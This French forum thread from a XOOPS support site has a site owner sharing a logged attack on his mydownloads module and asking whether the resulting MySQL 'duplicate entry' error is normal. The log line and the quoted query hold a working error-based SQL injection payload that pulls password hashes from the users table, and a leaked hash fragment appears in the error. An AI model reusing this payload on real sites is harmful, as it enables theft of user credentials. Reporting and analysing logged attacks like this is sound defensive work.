Fork me on GitHub






Attaque - question idiote
Team FrXoops
Inscrit: 12/08/2003 14:34
De Montpellier
Messages: 209
Bonjour,

je pense que quelqu'un (des chinois, au hasard ) a trouvé que j'utilise Xoops, et une 1.3.10.

J'ai trouvé ça cet aprem dans mes logs suite à un pic de charge sur mon dédié :
118.0.195.139 - - [29/May/2016:18:48:52 +0200"GET /modules/mydownloads/singlefile.php?lid=44%20or%20(select%201%20from%20(select%20count(*)%2cconcat((concat(0x5e5e21%2c((select%20char_length((select%20concat(0x5e5e21%2cpass%2c0x215e5e)%20from%20ollie.fpc_users%20limit%20479%2c1))))%2c0x215e5e))%2cfloor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 6792 "-" "BaiduSpider"


en pagaille. Un petit coup d'iptables a résolu le problème =)

Cet appel me donne :
Citation :
MySQL Query Error: SELECT fpc_mydownloads_cat.title, fpc_mydownloads_downloads.title, fpc_mydownloads_text.description FROM ( fpc_mydownloads_cat, fpc_mydownloads_text ) INNER JOIN fpc_mydownloads_downloads ON ( fpc_mydownloads_cat.cid=fpc_mydownloads_downloads.cid ) WHERE (fpc_mydownloads_downloads.lid=44 or (select 1 from (select count(*),concat(((select substr((select concat(0x5e5e21,pass,0x215e5e) from ollie.fpc_users limit 407,1),1,58))),floor(rand(0)*2))x from information_schema.tables group by x)a) AND fpc_mydownloads_text.lid=44 or (select 1 from (select count(*),concat(((select substr((select concat(0x5e5e21,pass,0x215e5e) from ollie.fpc_users limit 407,1),1,58))),floor(rand(0)*2))x from information_schema.tables group by x)a)) LIMIT 0,5
Error number:1062
Error message: Duplicate entry '^^!0d9f25661cd6a2c54c4a5634f23005c0!^^1' for key 'group_key'

Ma question est : est-ce que le duplicate entry est normal ?

Posté le : 29/05/2016 18:56

11 ans de Xoops !
Partager Twitter Partagez cette article sur GG+
Re: Attaque - question idiote
Admin Frxoops
Inscrit: 16/05/2003 18:10
De Rhone-Alpes
Messages: 4051
Contrôle aussi le lid 44 du module mydownload sur ton site.

Posté le : 29/05/2016 21:43

Open in new window
Partager Twitter Partagez cette article sur GG+
Re: Attaque - question idiote
Team FrXoops
Inscrit: 12/08/2003 14:34
De Montpellier
Messages: 209
Rien de particulier, c'est le XP SP2 & TCP-IP limité. Rien dans les champs de particulier lors de l'édition.

Posté le : 29/05/2016 22:16

11 ans de Xoops !
Partager Twitter Partagez cette article sur GG+
Re: Attaque - question idiote
Admin Frxoops
Inscrit: 04/03/2011 09:10
De Lot
Messages: 2837
Citation :

Ma question est : est-ce que le duplicate entry est normal ?


Le "duplicate entry" est une alerte MySQL, il interdit d'avoir plusieurs "id" identique.
Le fait que tu as ce message montre qu'il y a quelque part une faille d'injection MySQL, très dangereux, car là c'est bien tombé, l'id 44 existait déjà mais si il avait mis un id inexistant, ils auraient put faire des dégats. D'ailleurs ils peuvent en faire en supprimant des données MySQL de la même manière.

Posté le : 03/06/2016 22:56
Partager Twitter Partagez cette article sur GG+

 Haut   Précédent   Suivant



Vous pouvez voir les sujets.
Vous ne pouvez pas débuter de nouveaux sujets.
Vous ne pouvez pas répondre aux contributions.
Vous ne pouvez pas éditer vos contributions.
Vous ne pouvez pas effacez vos contributions.
Vous ne pouvez pas ajouter de nouveaux sondages.
Vous ne pouvez pas voter en sondage.
Vous ne pouvez pas attacher des fichiers à vos contributions.
Vous ne pouvez pas poster sans approbation.

Propulsé avec XOOPS | Graphisme adapté par Tatane, Grosdunord, Montuy337513

56 Personne(s) en ligne (48 Personne(s) connectée(s) sur Forum) | Utilisateur(s): 0 | Invité(s): 56 | Plus ...